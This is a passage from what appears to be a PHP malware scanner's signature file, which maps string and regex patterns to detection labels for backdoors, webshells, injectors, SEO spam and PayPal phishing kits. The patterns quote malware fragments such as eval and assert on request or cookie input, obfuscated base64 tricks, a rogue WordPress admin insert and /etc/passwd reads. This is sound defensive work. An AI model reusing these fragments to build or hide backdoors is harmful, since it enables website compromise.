	'$checkout = Mage::getSingleton(\'checkout/session\')->getQuote();' => array(STR_TRIGGER,
	),

	'strpos($_SERVER[\'HTTP_REFERER\'], \'ie=utf-8\')' => array(STR_WARN, 'php.malware.injector_gen.024', NULL,1),
	'if (strpos($USER_AGENT, "slurp")) $robot = 1;' => array(STR_WARN, 'php.malware.injector_gen.023', NULL, 1),
	'"^66.102.*.*", "^66.249.*.*", "^72.14.192.*", "^74.125.*.*", "^208.91.*.*",' => array(STR_WARN, 'php.malware.antibot-check.001', NULL, 1),
	'=strtolower($_SERVER[":>:8:' => array(STR_WARN, 'php.backdoor.generic.042', NULL, 1),
	'PING.*//ENDPING' => array(STR_WARN, 'php.backdoor.cache_module.004', NULL, 1),
	'wpt.ninja' => array(STR_WARN, 'php.spam-seo.pstmtd-redirect.002', NULL, 1),
	'file_put_contents($_SERVER["SCRIPT_FILENAME"]' => array(STR_WARN,'php.backdoor.script_injection.012', NULL, 1),
),

'document.write(' => array(STR_TRIGGER,  

	'<iframe' => array(STR_TRIGGER,
		'\n{50,}document\.write\(.<iframe\s*width=.0.\s*height=.0.\s*frameborder=.0.\s*src=.[htps]{4,5}' => array(REX_WARN, 'php.spam-seo.iframer.005', NULL),
	),

	'%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74' => array(STR_TRIGGER,  
		'document\.write\s*\(\s*unescape\s*\(\s*..3C.73.63.72.69.70.74.20.74.79.70.65.3D.22.74' => array(REX_WARN, 'rex.js_encoded.001', NULL),
	),

	'sharebutton' => array(STR_TRIGGER,
	),

	'=String.fromCharCode(60,115,99,114,105,112,116' => array(STR_WARN, 'js.spam-seo.generic-injector.001', NULL, 1),
	'var [\w]+[\s]*=[\s]*[\w]+([\s]*\+[\s]*[\w]+){10,};[\s]*document.write\([\w\s]*\);' => array(REX_WARN, 'rex.multi_vars.002', NULL),
	'document.write..<script language=javascript src=.?http:..[^\/]+\/[^\/]+\/[^>]+.txt.?><.script>..;' => array(REX_WARN, 'rex.document-write-textfile.001', NULL),
	'.charCodeAt(0) ^ ' => array(STR_WARN, 'js.malware.injector.003', NULL, 1),
	'<script[^>]+>[\s]*document.write\([\'"]<[div\'"+\s]{5,}[^>]+?l[\'"+\s]*e[\'"+\s]*f[\'"+\s]*t[\'"+\s]*:[\s]*-[\d]{4,}' => array(REX_WARN, 'rex.spam-seo.hidden-style.006', NULL),
	'%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%68%74%74%70%3A%2F%2F' => array(STR_WARN, 'js.malware.redirect.004', NULL, 1),
	'%25%36%39%25%37%30%25%37%34%25%33%45%27%29%29%3B%0A%2F%2F%2D%2D%3E%0A%3C%2F%53%63%72%69%70%74%3E\'));' => array(STR_WARN, 'html.malware.multi_encryption.001', NULL, 1),
	'<script language="javascript" type="text/javascript"> document.write("<div style=\"position: absolute; top: -' => array(STR_WARN,'js.spam-seo.injector.026', NULL, 1),
),

'"."' => array(STR_TRIGGER,
	'"ev"."al(gzi"."nflate' => array(STR_WARN, 'php.backdoor.gzinflate.001', NULL,1),
	'"e"."v"."a"."l(' => array(STR_WARN, 'php.malware.eval_gen.002', NULL,1),
	'.""."6"."".""."4".' => array(STR_WARN, 'php.malware.base64.005.02', NULL,1),
	'6"."4"."_"."de' => array(STR_WARN, 'php.malware.base64.005.03', NULL,1),
	'.""."6".""."4".' => array(STR_WARN, 'php.malware.base64.005.04', NULL,1),
	'.""."".""."' => array(STR_WARN, 'php.malware.empty_concatenation.001', NULL, 1),
	'$k="ass"."ert";' => array(STR_WARN, 'php.malware.assert.005', NULL,1),
	'eat"."e_fun' => array(STR_WARN, 'php.backdoor.create_function.009', NULL,1),
	'ase6"."4_de' => array(STR_WARN, 'php.malware.base64.020', NULL,1),
	'$=~[];$={__' => array(STR_WARN, 'js.malware.type_cast_encryption.001', NULL,1),
	'/*-/*-*/($/*-/*-*/' => array(STR_WARN, 'php.malware.assert.003', NULL, 1),
),

'$' => array(STR_TRIGGER,  

	'= array(' => array(STR_TRIGGER,
		'\$[^\s]+\s= array\(("[^"]{10,}",){40}' => array(REX_WARN, 'rex.array_join.007', NULL),
		'Google    NetRange:   66.249.64.0 ' => array(STR_WARN, 'php.backdoor.ipcheck.001', NULL,1),
	),

	'O0' => array(STR_TRIGGER,
		'\$[0O_]{3,}[\s]*=[\s]*.[\w]\/[\w]\/[\w]\/[\w].;' => array(REX_WARN, 'php.malware.generic.091', NULL),
	),

	'$m=explode(";","' => array(STR_WARN, 'php.backdoor.generic-webshell.001.34', NULL,1),
	'/.*/e' => array(STR_WARN, 'php.backdoor.pregreplace.012', NULL,1),
	'$timer_sum_stop = \'ew' => array(STR_WARN, 'php.spam-seo.injector_gen.004', NULL,1),
	'ase\' . \'64\' . \'_' => array(STR_WARN, 'php.malware.base64.005.05', NULL, 1),
	'64\'.chr(95).\'d' => array(STR_WARN, 'php.malware.base64.005.06', NULL, 1),
	'$_[@!+_]' => array(STR_WARN, 'php.malware.obfuscated.006', NULL,1),
),

'strrev' => array(STR_TRIGGER,
	'substr(md5(strrev($' => array(STR_WARN, 'php.malware.strrev.001', NULL,1),
	'strrev("edoced_4"."6esab");' => array(STR_WARN, 'php.malware.base64.001.020',NULL,1),
	'strrev(\'ecalp' => array(STR_WARN, 'php.backdoor.pregreplace.013', NULL,1),
	'$_ = strrev("tress\x61");' => array(STR_WARN, 'php.spam-seo.redirect.027', NULL,1),
	'chr(ord(substr(strrev' => array(STR_WARN, 'php.malware.strrev.003', NULL,1),
	'gzinflate(strrev(' => array(STR_WARN, 'php.malware.strrev.004', NULL,1),
	'*/"SELECT option_value FROM $wpdb->options WHERE option_name=\'rss_' => array(STR_WARN, 'php.malware.injector.019', NULL, 1),
	'etalfnizg' => array(STR_WARN, 'php.malware.generic.027.009', NULL,1),
),

'GET' => array(STR_TRIGGER,
	'isset($_GET[\'indonesia\'])' => array(STR_WARN, 'php.backdoor.hmei7.001', NULL,1),
	' fopen($_GET[\'' => array(STR_WARN, 'php.backdoor.uploader.007', NULL,1),
	'$pass = $_GET[\'pass\'];' => array(STR_WARN, 'php.backdoor.filesman.001.003', NULL,1),
	', file_get_contents($_GET' => array(STR_WARN, 'php.backdoor.file_get_contents.006', NULL,1),
	'VALUES (\'wpbackup\', MD5(\'pass123\'), \'firstname lastname' => array(STR_WARN, 'php.backdoor.wp_adminadd.001', NULL, 1),
	'; $x0b=$_GET; $' => array(STR_WARN, 'php.spam-seo.header_location.020', NULL, 1),
	'&&\$_GET\[[\w]\]\(\$_GET\[[\w]\]\);' => array(REX_WARN, 'php.backdoor.eval_gen.020', NULL),
),

'^' => array(STR_TRIGGER,

	'new RegExp' => array(STR_WHITE,
		'"^"' => array(STR_TRIGGER,
		),
	),

	'//www.adminer.org/' => array(STR_WHITE,
		'[\'"][\s]*\.[\s]*[\w]{5,}[\s]*\.[\s]*[\'"]' => array(REX_TRIGGER,
			'\$[\w]+=\$[\w]+\^' => array(REX_WARN, 'rex.xor_warnings.002', NULL),
		),
	),

	'(\$\w+)\s*=\s*\(?([\'"])[^\'"]+\2\^\2[^\'"]+\2\)?.+\s*\1\s*\(' => array(REX_WARN, 'rex.xor_func_name.001', NULL),
	'"\s*\^\s{2,}"' => array(REX_WARN, 'rex.xor_data.001', NULL),
	'"\^"\\\[0-7]{2,3}' => array(REX_WARN, 'rex.xor_data.003', NULL),
	'\s.[a-z0-9]\w+\.\'[^\']+?\'\.[a-z0-9]\w+\.\'[^\']+?\'' => array(REX_WARN, 'rex.xor_warnings.001', NULL),
	'\\*\\/[\\s]*\\^[\\s]*\\/\\*.*\\x1B' => array(REX_WARN, 'rex.xor_warnings.003', NULL),
	'\/\*\s?[^\n]++\s?\*\/[^\^]++\^[^\/]++(?:\/\*\s?[^\n]++\s?\*\/[^\n]++)' => array(REX_WARN, 'rex.multicomments.001', NULL),   
),

'.php' => array(STR_TRIGGER,

	'<FilesMatch "\.(php|inc)$">' => array(STR_TRIGGER,
		'500 errors, https://mantis.phplist.com/view.php?id=9937' => array(STR_TRIGGER,
			'.php)$">' => array(STR_TRIGGER, //it may match legitimate phplist .htaccess files www.phplist.com
			),
		),
	),

	'loxotrap.php' => array(STR_WARN, 'php.malware.flashpack.001.001', NULL, 1),
	'ldcigar.php' => array(STR_WARN, 'php.malware.flashpack.001.002', NULL, 1),
	'/renegater.php' => array(STR_WARN, 'php.malware.flashpack.001.003', NULL,1),
	'load0515p6jse9.php' => array(STR_WARN, 'php.malware.flashpack.001.004', NULL,1),
	'/newgater.php' => array(STR_WARN, 'php.malware.flashpack.001.005', NULL,1),
	'pbcl(\\$_SVYRF' => array(STR_WARN, 'php.backdoor.str_rot13_uploader.001.02', NULL,1),
	'\'/wp-content/themes/theme.php\'' => array(STR_WARN, 'php.backdoor.uploader.004.02', NULL,1),
),

'<met' => array(STR_TRIGGER,

	'<meta http-equiv="refresh" content=' => array(STR_TRIGGER,
		'/Archive.rar"/>' => array(STR_WARN, 'html.redirect.http-Refresh_gen.004', NULL, 1),
	),

	'url=data:text/html;' => array(STR_TRIGGER,
		';base64' => array(STR_WARN, 'html.redirect.http-Refresh-base64.001', NULL, 1),
	),

	'(?i)<meta\s+?http-equiv\s*?=\s*?["\']?refresh["\']?\s+?content\s*?=\s*?["\']?\d+?\s*?;\s*?URL\s*?=\s*?(?:https?:)\/\/[\w\.\-]+?\.(?:online|chat|top|xyz|pro|gl|ly|cc)["\'\/][^>]+?>' => array(REX_WARN, 'rex.location_refresh.002', NULL),
),

'document.' => array(STR_TRIGGER,

	'unction clk()' => array(STR_TRIGGER,
	),

	'payment.save();' => array(STR_TRIGGER,
	),

	'teksasli=unescape(teks);document.write(teksasli' => array(STR_WARN, 'js.malware.generic.004', NULL, 1),
	'document.write(String.fromCharCode(60,115,99,114,105,112,116,32,' => array(STR_WARN, 'js.malware.injector.007', NULL,1),
	'/*visitorTracker*/' => array(STR_WARN, 'js.malware.visitor_tracker_gen.001', NULL, 1),
	'"\x6e\x6f","\x6e\x65"];document.getElementById' => array(STR_WARN,'js.spam-seo.hidden-style.001', NULL, 1),
),

'COOKIE' => array(STR_TRIGGER,

	'_COOKI' => array(STR_TRIGGER,  
		'eval\(\$\w+\(\$_COOKIE' => array(REX_WARN, 'rex.eval_cookie.001', NULL),
		'\*\/@\$\w+&&@\$\w+\(\$\w+,\$\w+\);\/\*' => array(REX_WARN, 'rex.eval_cookie.002', NULL),
		'isset\(\$_COOKIE\[[^\]]+\]..\s*\@?\$_COOKIE\[[^\]]+\]\(\$_COOKIE\[[^\]]+\]\)' => array(REX_WARN, 'rex.eval_cookie.004', NULL),
	),

	'public function __construct() {' => array(STR_TRIGGER,
		'= @$_COOKIE[\'' => array(STR_WARN, 'php.backdoor.eval_COOKIE.001.02', NULL, 1),
	),

	'$_COOKIE["___' => array(STR_WARN, 'php.malware.injector.007', NULL,1),
	'](@$_COOKIE[' => array(STR_WARN, 'php.backdoor.cookie.001', NULL,1),
	'@$F&&@$F($A,$B);' => array(STR_WARN, 'php.malware.generic.056', NULL,1),
),

'href=' => array(STR_TRIGGER, 

	'<li><a href=' => array(STR_TRIGGER,  
		'(<li><a href=(")*http[^>]+>(\w|\s)+[^<]+<.a><.li>\s*){20}' => array(REX_WARN, 'rex.link_sequence.001', NULL),
	),  

	'<b\s*style=.display:none;.>\n(<a href=.http[^<]+\w+[^>]+>[^>]+br>\n){3,}<.b>' => array(REX_WARN, 'rex.link_newlines.002', NULL),
	'<a href[^<]+\W?(cialis|pills|buy-cheap|viagra|tadafil|fluoxetine)[^>]+>\W?(cialis|pills|buy-cheap|viagra|tadafil|fluoxetine|domperidone)[^>]+<.a>' => array(REX_WARN, 'rex.spam_seo_links.001', NULL),
	'>buy instagram followers</a>' => array(STR_WARN, 'html.spam-seo.generic.008', NULL, 1),
	'.xyz" target="_blank" style="color: ' => array(STR_WARN, 'php.spam-seo.xyz_link.001', NULL, 1),
),

'REQUEST' => array(STR_TRIGGER,
	'({$_REQUEST[' => array(STR_WARN, 'php.backdoor.request.003', NULL,1),  
	'array_keys($_REQUEST)[0];' => array(STR_WARN, 'php.backdoor.request_keys.003', NULL, 1),
	'$req[\'ab\']($req[\'bc\'],' => array(STR_WARN, 'php.backdoor.request.002', NULL, 1),
	'eval\(\/\*[\w]+\*\/\$_REQUEST' => array(REX_WARN, 'rex.backdoor.eval_REQUEST.001', NULL),
	'php error_reporting(0);eval("if(isset(\$_REQUEST[' => array(STR_WARN, 'php.backdoor.eval_REQUEST_gen.003', NULL,1),
	'@array_diff_ukey(@array((string)$_REQUEST[\'password' => array(STR_WARN, 'php.backdoor.array.002', NULL, 1),
),

'.location' => array(STR_TRIGGER,

	 'window.location' => array(STR_TRIGGER,
		'if\(navigator.userAgent.match[^;]+(\|\.\*android\.\*|zeto|Toshiba|Smartphone|WindowsPhone|SonyEricsson)[^;]+window.location[^;]+;' => array(REX_WARN, 'rex.js_redirect.001', NULL),
		'[\s]{50}<script>[\s]*window.location[\s]*=[\s]*[\'"]http' => array(REX_WARN, 'rex.js_spaced-code.001', NULL),
		'GetHttpPage' => array(STR_WARN, 'php.spam-seo.injector.094.03', NULL, 1),
	 ),

	'top.location' => array(STR_TRIGGER,
		'window.top.location' => array(STR_TRIGGER,
			'window.top.location.href=.(\D+"\+"){1,}' => array(REX_WARN, 'rex.js_redirect-concat.002', NULL),
		),
	),
),

'$_POST' => array(STR_TRIGGER,

	'\(\@?\$_POST\[' => array(REX_TRIGGER,  
		'@\$[\w]+=\$\{[\w]+\}\(\'\',\$\{[\w]+\}\(\$[\w]+,\'[\w]{8,}\',\'[\w]{8,}\'\)\);@\$[\w]+\(\);' => array(REX_WARN, 'rex.substitute_crypt.001', NULL),
		'\$(\w+) = \$_POST\[.\1.\];\s*\$(\w+) = \$_POST\[.\2.\];[^;]+\$\2.\$_POST[^;]+\$\1.\$_POST[^;]+' => array(REX_WARN, 'rex.eval_POST.001', NULL),
		'\$\w+\s*=\s*\(?["asert\'\.]+\)?;\s*\$\w+\(\$_POST\[' => array(REX_WARN, 'rex.backdoor_concatenated_function.002', NULL),
	),

	'\$\w+\s*=\s*(.[base64_dco]+.\.){2,}.[base64_dco]+.;' => array(REX_WARN, 'rex.backdoor_concatenated_function.001', NULL),
	'\$_POST {4,}(\)|\[)' => array(REX_WARN, 'rex.spaced_POST.002', NULL),
),

'Add' => array(STR_TRIGGER,

	'AddHandler' => array(STR_TRIGGER,
		'AddHandler cgi-script .py' => array(STR_WARN, 'htaccess.hacktool.cgi.001',  NULL,1),
		'AddHandler cgi-script .izo' => array(STR_WARN, 'htaccess.hacktool.cgi.002',  NULL,1),
		'AddHandler txt .php' => array(STR_WARN, 'htaccess.hacktool.symlink-viewer.002',  NULL,1),
	),

	'AddType text/plain .php' => array(STR_WARN, 'htaccess.hacktool.symlink-viewer.001',  NULL,1),
	'DirectoryIndex 1337mir.htm' => array(STR_WARN, 'htaccess.defaced.directory-index.001', NULL, 1),
	'DirectoryIndex Sux.html' => array(STR_WARN, 'htaccess.defaced.directory-index.002', NULL, 1),
),

'Dim ' => array(STR_TRIGGER,
	'Dim action,password,pathname,pathname2,keywordindex,indexfile,filename,body' => array(STR_CLEARFILE, 'asp.spam-seo.injector.006', NULL),
	'if instr(strTemp1,"northface")>0 or instr(strTemp1,"north-face")>0' => array(STR_CLEARFILE, 'asp.spam-seo.redirect.003', NULL),
	') & Request.ServerVariables ( Chr (' => array(STR_WARN, 'asp.malware.obfuscated.001.05', NULL,1),
),

'aypa' => array(STR_TRIGGER,
	'PayPal</title>' => array(STR_WARN, 'html.phishing.paypal.001.002', NULL, 1),
	'PayPal</TITLE>' => array(STR_WARN, 'html.phishing.paypal.001.003', NULL, 1),
	'content="name=My Account;action-uri=https://www.paypal.com' => array(STR_WARN, 'html.phishing.paypal.001.011', NULL,1),
	'(\'Location:http://paypal.com' => array(STR_WARN, 'php.phishing.paypal.009', NULL, 1),
),

'absolute;' => array(STR_TRIGGER,
	 
	'<div style="position: absolute; ' => array(STR_TRIGGER,  
		'<div style="position: absolute; (top|left):\s*-\d{3,}px;[^>]+width:\s*\d{3,}px.?">' => array(REX_WARN, 'rex.hidden_div.001', NULL),
		'<div style="position: absolute; left: -\d\d\d\dpx">' => array(REX_WARN, 'rex.hidden_div.004', NULL), 
	),

	'left:\s*-' => array(REX_TRIGGER,  
		'[\s]{100}<div style="position:absolute;[^-]+left:-[\d]{3}' => array(REX_WARN, 'rex.hidden_div.002', NULL),
		'<div style=\'left: -\d{4,}px;[^>]+top:\s*-\d{4,}px;?.>' => array(REX_WARN, 'rex.hidden_div.003', NULL),
	),

	'<div style="position:absolute; top:-' => array(STR_TRIGGER,
		'<div style="position:absolute; top:-\d{4,}px;" id="\w+">\w[^<]+<a href=' => array(REX_WARN, 'rex.hidden_div.005', NULL),
	),
),

'str_replace(' => array(STR_TRIGGER,

	'[\'"],\s*[\'"]{2},' => array(REX_TRIGGER,
		'\$[\w]+[\s]*=[\s]*\$[\w]+\([\'"][\w][\'"],[\s]*[\'"]{2},[\s]*.{0,5}b.{0,5}a.{0,5}s.{0,5}e.{0,5}6.{0,5}4.{0,5}_.{0,5}d.{0,5}e.{0,5}c.{0,5}o.{0,5}d.{0,5}e.{0,5}\);' => array(REX_WARN, 'rex.b64_obfuscation.001', NULL),
		'\$[\w]=str_replace\([\'"][\w][\'"],[\'"]{2},(\$[\w]\.){5,}' => array(REX_WARN, 'rex.backdoor_weevely.001', NULL),
	),

	'str_replace(j, ""' => array(STR_TRIGGER,
		'str_replace(j, ""' => array(STR_WARN, 'php.malware.assert.006', NULL,1),
	),

),

'passthru' => array(STR_TRIGGER,

	'$dbtablesArray = unserialize(stripslashes(' => array(STR_TRIGGER,
		'if (empty($optArray[\'ss_docroot\'])) { $optArray[\'ss_docroot\'] = dirname' => array(STR_WARN, 'php.hacktool.joomlacloner.001', NULL,1),
	),

	'passthru($_' => array(STR_WARN, 'php.backdoor.wscript-shell.001', NULL,1),
	'passthru(getenv' => array(STR_WARN, 'php.backdoor.passthru.001', NULL,1),
	'passthru("$cmd");' => array(STR_WARN, 'php.backdoor.passthru.002', NULL,1),
	'setcookie( "mysql_web_admin_' => array(STR_WARN, 'php.backdoor.mysql_shell.002', NULL, 1),
),

'assert' => array(STR_TRIGGER,

	'assert_options(ASSERT_QUIET_EVAL,' => array(STR_TRIGGER,
		'(ASSERT_WARNING' => array(STR_WARN, 'php.malware.assert.010', NULL,1),
	),

	'@assert(implode' => array(STR_WARN, 'php.malware.assert.001', NULL,1),
	'assert(stripslashes' => array(STR_WARN, 'php.malware.assert.002', NULL,1),
	'assert($_' => array(STR_WARN, 'php.malware.assert.004', NULL,1),
	'@assert(base64_decode(' => array(STR_WARN, 'php.malware.assert.009', NULL,1),
),

'<iframe' => array(STR_TRIGGER,  
	'<iframe[^>]+src[^>]+(ddns.name|bit.ly|bitly.com|bit.do|goo.gl|is.gd|tr.im)[^<]+<.iframe>' => array(REX_WARN, 'rex.url_short.001', NULL),
	'index\.php\?tp=[\da-f]{16,}" width="(0|1)" height="(0|1)" frameborder="0"' => array(REX_WARN, 'rex.hidden_iframe.tp.001', NULL),
	'/*mx_end*/ ?>' => array(STR_WARN, 'php.iframe.mx_start.001.02', NULL, 1),
	'?>/*mx_end*/' => array(STR_WARN, 'php.iframe.mx_start.001.03', NULL, 1),
),   

'passw' => array(STR_TRIGGER,

	'@author `system' => array(STR_WHITE,
		'http://fimd.dcid.me' => array(STR_WHITE,
			'>Generated' => array(STR_WHITE,
				'\/etc\/passwd[\'"]' => array(REX_WARN, 'php.exploit.sysinfo.001', NULL,1),
			),
		),
	),

	'$password=$a[4].\'.\'.$a[3].\'.\'.$a[2].\'.\'.$a[1];' => array(STR_WARN, 'php.spam-seo.tds-redirect.002', NULL,1),
	'open(ETC_PASSWD, \'/etc/passwd' => array(STR_WARN, 'pl.backdoor.confspy.001', NULL,1),
	'print exploit' => array(STR_WARN, 'py.hacktool.generic_exploit.001', NULL, 1),
),

'$_FILES' => array(STR_TRIGGER,

	'copy' => array(STR_TRIGGER,
		'tmp_name' => array(STR_TRIGGER,
			'<\?php\s*(?:if\s*\(isset\(\s*\$_(?:GET|REQUEST|POST)\[[^}]+|echo\s*"<center>[^\$]+|php_uname[^\@]+|error_reporting\(0\);[^\@]+|echo "[^\@]+|echo +.<[^\@]+)(?:if\s*\(\s*\$_POST\[.[\w_]+.\][^\\{]++\{\s*)?if\s*\(\s*@?copy\(\$_FILES\[.(\w+).\]\[.tmp_name.\]' => array(REX_WARN, 'rex.uploader.001.02', NULL),
		 ),
	 ),

	'GAGAL' => array(STR_TRIGGER,
		'SUKSES' => array(STR_TRIGGER,
		),
	),
),

'filter' => array(STR_TRIGGER,

	'ray_filter' => array(STR_TRIGGER,
	
		'; echo \'OK\'; Exit;}' => array(STR_TRIGGER,
		),
	
		'@[\s]*array_filter[^;]+(_COOKIE|_SERVER|_REQUEST|_POST)' => array(REX_WARN, 'rex.backdoor.eval.004', NULL),
	),

	'ilter_var' => array(STR_TRIGGER,
		 '@[\s]*filter_var[^;]+(_COOKIE|_SERVER|_REQUEST|_POST)' => array(REX_WARN, 'rex.backdoor.eval.005', NULL),
	),
),

');$' => array(STR_TRIGGER,

	'\$[^a-zA-Z\d\-_\(\)\[\]]{1,10}[\s]*=' => array(REX_TRIGGER,
		'\$[^a-zA-Z\d\-_\(\)\[\]&#@%\}\{]{1,10}\(\);' => array(REX_WARN, 'rex.eval_post.006', NULL),
	),

	'\'./*' => array(STR_TRIGGER,
		'\$[\w]+=[\'"][^\'"]+[\'"]\^[\'"]' => array(REX_WARN, 'rex.backdoor_obfuscated.002', NULL),
	),

 	'__();' => array(STR_TRIGGER,
		'[@eval\s\.\']{8,}[^\)]+\);.[^_]+__\(\);' => array(REX_WARN, 'rex.backdoor.eval_post.003', NULL),
 	),

	'$_1=$_("YXJyYXlfbWFw");' => array(STR_WARN,'php.backdoor.eval_POST.012', NULL, 1),
),

'die' => array(STR_TRIGGER,

	'passw' => array(STR_TRIGGER,
	),

	'####=TEMP END=####' => array(STR_TRIGGER,
		'####=TEMP START=####' => array(STR_WARN, 'php.malware.generic.062', NULL, 1),
	),

),

'.chr(' => array(STR_TRIGGER,
	'if(!isset($_REQUEST[chr(' => array(STR_WARN, 'php.backdoor.eval_REQUEST_gen.002', NULL,1),
	'(chr\(\d{2,3}\) *\.){30}' => array(REX_WARN, 'rex.chr_concatenation.001', NULL),
	'(\$\w+)\s*=\s*(chr\((98|97|115|101|54|52|95|100|101|99|111)\)\.?){13};' => array(REX_WARN, 'php.malware.chr_base64.001', NULL),
	'(?:chr\(\d+-\d+\).){10}' => array(REX_WARN, 'rex.chr_concatenation.003', NULL),
),

'_reporting' => array(STR_TRIGGER,
	'echo fwrite ($fh, stripslashes($_POST["raw_data"]));' => array(STR_WARN,'php.backdoor.uploader_POST.001', NULL, 1),
	';@ini_set("display_errors",0);@error_reporting(0);echo base64_decode("' => array(STR_WARN, 'php.malware.injector.021.02', NULL, 1),
	'$__var_to_echo = \'<script type="text/javascript" src="' => array(STR_WARN, 'php.spam-seo.injector_gen.037', NULL,1),
	'.php" . "?fid=1461819&info=" . http_build_query( $' => array(STR_WARN, 'php.spam-seo.injector_gen.038', NULL,1),
),

'@$' => array(STR_TRIGGER,

	 '${' => array(STR_TRIGGER,
		'\$[\s]*\{[\s@\'"]*([a-zA-Z0-9]{1,10})[\'"]*\}[^;\n]{1,50}@[\s]*\$[^;\n]{1,50}\1[^}]' => array(REX_WARN, 'rex.backdoor.eval.002', NULL),
	 ),

	 ';\$[\w]+\(\$[\w]+\);if\(\$[\w]+\(@\$[\w]+\[\$[\w]+\]\)==' => array(REX_WARN, 'rex.backdoor_obfuscated.001', NULL),
	 'function [\w_]+\(\$[\w_]+, \$[\w_]+, \$[\w_]+\) \{[\s]*\$[\w_]+ = [\'"chr\.\s]{5,};[\s]*\$[\w_]+ = [\'"unlik\.\s]{8,};' => array(REX_WARN, 'rex.var_obfuscated.001', NULL),
),

'$GLOBALS[' => array(STR_TRIGGER,

	 '=urldecode(' => array(STR_TRIGGER,
		'\$content\s*=\s*str_replace\(\$repstr .\$GLOBALS\[.[0O]{9,}' => array(REX_WARN, 'rex.0nOs.001', NULL),
	 ),

	 '\$GLOBALS;(\$[\w]+)\[.([\w]+).\]=\".x[^;]+;\1\[(\1\[.\2.\]\[[\d]+\]\.){3}' => array(REX_WARN, 'rex.array_join.009', NULL),
	 '(\$GLOBALS\[.\w+.\]\s*=\s*(\$\w+\[\d+\]\s*\.\s*){2,}+\$\w+\[\d+\];\s){10}' => array(REX_WARN, 'rex.function_GLOBAL.002', NULL),
),

'gif89' => array(STR_TRIGGER,
	'\Agif[^\n]+\s*<.[PHph]{3}' => array(REX_WARN, 'rex.fake_gif.004', NULL),
	'\Agif[^\n]+\s*<.[HTMLhtml]{4}' => array(REX_WARN, 'rex.fake_gif.005', NULL),
	'\Agif[^\n]+\s*<%' => array(REX_WARN, 'rex.fake_gif.006', NULL),
),

'PAYPAL' => array(STR_TRIGGER,
	'PAYPAL.namespace("CreditCardInput");' => array(STR_WARN, 'js.phishing.paypal.001', NULL, 1),
	'PAYPAL.namespace("GP.CreditCardInput");' => array(STR_WARN, 'js.phishing.paypal.001.02', NULL, 1),
	'{ PAYPAL.core.Navigation.init();' => array(STR_WARN, 'js.phishing.paypal.002', NULL, 1),
),

'message' => array(STR_TRIGGER,
	'$message .= "Card Number' => array(STR_WARN, 'php.phishing.mailer.034', NULL, 1),
	'public $offline_message = \'Hacked' => array(STR_WARN, 'php.defaced.joomla-hack.001', NULL, 1),
	'public $sitename = \'Hacked' => array(STR_WARN, 'php.defaced.joomla-hack.001.02', NULL, 1),
),

'create_functio' => array(STR_TRIGGER,

	'=create_function(\'\',' => array(STR_TRIGGER,  
		'=create_function\(\'\',\$\w\w\w+\);\$\w\w\w+\(\);' => array(REX_WARN, 'rex.create_function.001', NULL),
	),

	'create_function("",file_get_contents(' => array(STR_TRIGGER,  
		'create_function\("",file_get_contents\(\S+\.png\W' => array(REX_WARN, 'rex.create_function.002', NULL),
	),

),

'.$' => array(STR_TRIGGER,

	'&&define("jquery",[],function(){return x}))})(window);' => array(STR_TRIGGER,
		'&&define\("jquery",\[\],function\(\)\{return x\}\)\)\}\)\(window\);[\s]*(jQuery\.noConflict\(\);[\s]*)?var [\w]+[\s]*=[\s]*\[' => array(REX_WARN, 'js.malware.modified_jquery.001', NULL),
	),

	'\$\w+\[[A-Za-z]+\]\s*=\s*(\$\w+\[[A-Za-z]+\])\[\d+\](?:\.\1\[\d+\])+;' => array(REX_WARN, 'rex.array_concatenation.001', NULL),
	'="\147\137\162";' => array(STR_WARN,'php.backdoor.filesman.002.08', NULL, 1),
),

'/*/' => array(STR_TRIGGER,  

	'-color: #' => array(STR_WHITE,
		'\/\*\/\w\w\w\w\w\w\*\/' => array(REX_WARN, 'rex.mlw_comment_tag.001', NULL),
	),

	'\/\*[^\*]{0,2}\*\/[^\n]+?\/\*[^\*]{0,2}\*\/([^\n]+?\/\*[^\*]{0,2}\*\/[^\n]+?\/\*[^\*]{0,2}\*\/){50}' => array(REX_WARN, 'rex.mlw_comment_tag_warn.002', NULL),
),

'str_rot13(' => array(STR_TRIGGER,
	'str_rot13(strrev(' => array(STR_WARN, 'php.backdoor.str_rot13.001', NULL,1),
	'\'riny' => array(STR_WARN, 'php.backdoor.str_rot13.003', NULL,1),
),

'folio=' => array(STR_TRIGGER,
),

'pack(\'' => array(STR_TRIGGER,  
	'pack\(\'\S+\',substr\(\$\w+, -\d+\)\);' => array(REX_WARN, 'rex.pack.001', NULL),
	'=pack\(\'\S+\',\'\d\d\d\d\d\d\d\d+' => array(REX_WARN, 'rex.pack.002', NULL),
),

'{1' => array(STR_TRIGGER,
	'\$\w\w+\s*=\s*(?:\$\w\w+\{\d+\}\s*\.\s*){6}' => array(REX_WARN, 'rex.array_join.002', NULL),
	'(\$\w+)\s*=\s*[\'"][^\'"]+[\'"];(?:\s*\$\w+\s*=\s*(?:\1\{\d+\}\s*\.\s*){3,}\1\{\d+\};){2}' => array(REX_WARN, 'rex.str_array_join.002', NULL),
),

'[1' => array(STR_TRIGGER,
	 '(\$[\w_]+) *= *(?:array\()?[\'\"][\w_\.\?\*_@=\(\)\'\"\/\+;,#%\$\s]+[\'\"\)];[^\$]+(\$[\w_]+) *= *(?:\1\[\d+\] *\. *){5}' => array(REX_WARN, 'rex.array_join.001', NULL),
	 '(\\$[\\w]+)[\\s]*=[\\s]*["\'][^"\']+["\'];[\\s]*\\$[\\w]+[\\s]*=[\\s]*\\1\\[[\\d]+][\\s]*\\.\\1\\[[\\d]+' => array(REX_WARN, 'rex.str_array_join.001', NULL),
),

'@${' => array(STR_TRIGGER, //$auth_pass
	'{"_POST"' => array(STR_TRIGGER,
		'}=@$' => array(STR_WARN, 'php.backdoor.generic.062', NULL, 1),
	),
),

'*/^/*' => array(STR_TRIGGER,
	'\'}= ( ${\'' => array(STR_WARN,'php.malware.obfuscated.008', NULL,1), 
),

'Automatic login' => array(STR_TRIGGER,
	'wp_set_current_user ( $user->ID );' => array(STR_WARN, 'php.backdoor.wp-admin_bypass.003', NULL, 1),
),

')&Chr(' => array(STR_TRIGGER,  
	'e\+\w-v\+\w-a\+\w-l' => array(REX_WARN, 'rex.asp-encrypted.002', NULL),
),

'/apu.php?zoneid' => array(STR_TRIGGER,  
	'\/apu\.php\?zoneid=(?:\d{4,5}|\%d)' => array(REX_WARN, 'rex.unwanted-ad.001', NULL),
),

'UBound(' => array(STR_TRIGGER,  
	'([a-z]\d{2,3}){15}' => array(REX_WARN, 'rex.asp-ecrypted.001', NULL),
